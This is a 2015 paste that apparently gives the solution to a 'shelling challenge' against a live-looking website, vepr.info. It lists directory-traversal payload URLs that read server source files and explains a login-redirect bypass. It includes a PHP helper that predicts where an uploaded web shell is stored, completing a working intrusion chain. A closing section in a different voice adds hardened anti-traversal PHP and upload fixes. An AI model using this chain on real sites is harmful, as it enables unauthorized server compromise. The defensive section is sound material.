iAnonGuy

Zen's Shelling Challenge [Solution]

Aug 19th, 2015
So the challenge was to shell the site..
It was vulnerable to Directory Traversal; some people thought it was LFI and were trying methods including the php wrapper and stuff like that, so anyways..
Here occurs the vulnerability ~ http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt
Here's the full path ~ http://prntscr.com/86fm87
After crawling through the site we see there's a /upload.php, but if we go there we get redirected to "http://www.vepr.info/login.php?act=2&reason=99"
but that's not a big deal, we can easily bypass that by using NoRedirect. Let's read the file first..

http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php ~ http://prntscr.com/86fnk3
by reading upload.php we see there's a require() to get dem functions, so let's read 'includes/func.php'

http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php ~ http://prntscr.com/86fpby
by reading this we see that it takes a 'name' (your file name), does some 'leety stuff' with it and returns it *adds sorta timestamp*..

so we just have to use that function like this, http://prntscr.com/86fwcz ~ save this somewhere and we'll use it later..
----
<?php
// Copy of dwn_name() from includes/func.php: the name the site stores an upload under.
function dwn_name($name){
  $oldname=basename($name);
  $i=0;
  // walk back from the end of the name until the last '.'
  while((substr($oldname,-$i-1,1)!=".")&&($i<strlen($oldname)))
    $i++;
  $ext=substr($oldname,-$i,$i);                      // extension after the last '.'
  $base=substr($oldname,0,strlen($oldname)-$i-1);     // everything before it
  // digits 2-8 of the upload-time epoch are appended, so the stored name
  // depends only on the second the upload happened in
  return $base."_[".substr(time(),1,7)."].".$ext;
}
$x = $_REQUEST['shell'];   // the file name you uploaded, passed as ?shell=...
echo dwn_name($x);         // prints the name it was stored under
?>
----
let's go to upload.php, but before that we'll add /login.php in NoRedirect's 'filter-list' ~ http://prntscr.com/86fss8

okay let's go ~ http://prntscr.com/86fxmz as soon as you get this message http://prntscr.com/86fwu3
remember the php I told you to save? run it, and you'll get something like this. http://prntscr.com/86fx3t
Ta-Da! ~ http://prntscr.com/86fx9k
pl0x forgive me if there's any mistake ,_, dunt make fon of meh or i'll crie, i'll crie hurd
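For the defensive side of the traversal bug above (the `pohadka` parameter accepting `../` sequences), here is an added illustration, not vepr.info's code, of how a "show a story file" page can be written so a request cannot leave the story directory. It assumes the stories live in ./pohadky/ and are all .txt files; the naive function is constructed for contrast only.

```php
<?php
// Added illustration, not the site's code: a hardened "show story file" page.
// Assumed layout: story files live in ./pohadky/ and only *.txt is served.
const STORY_DIR = __DIR__ . '/pohadky';

// Constructed naive version, for contrast: the user-supplied name is glued
// onto the directory, so a name containing "../" walks out of STORY_DIR.
function show_story_naive($name) {
    return file_get_contents(STORY_DIR . '/' . $name);
}

// Hardened version: strip directory parts, allow-list the name pattern,
// then confirm the resolved path is still inside STORY_DIR.
function show_story_safe($name) {
    // 1. Discard any path components the caller supplied.
    $file = basename($name);

    // 2. Allow-list: plain names ending in .txt, nothing else.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.txt\z/', $file)) {
        return false;
    }

    // 3. realpath() resolves symlinks and "..", then check containment.
    $base = realpath(STORY_DIR);
    $path = realpath(STORY_DIR . '/' . $file);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }

    return file_get_contents($path);
}

// Request handling: anything the checks refuse gets a generic 404.
$body = show_story_safe($_GET['pohadka'] ?? '');
if ($body === false) {
    http_response_code(404);
    exit('Not found');
}
header('Content-Type: text/plain; charset=utf-8');
echo $body;
```

The upload half of the chain is a separate fix: store uploads under a random name rather than one derived from the upload time, and serve the upload directory with script execution disabled.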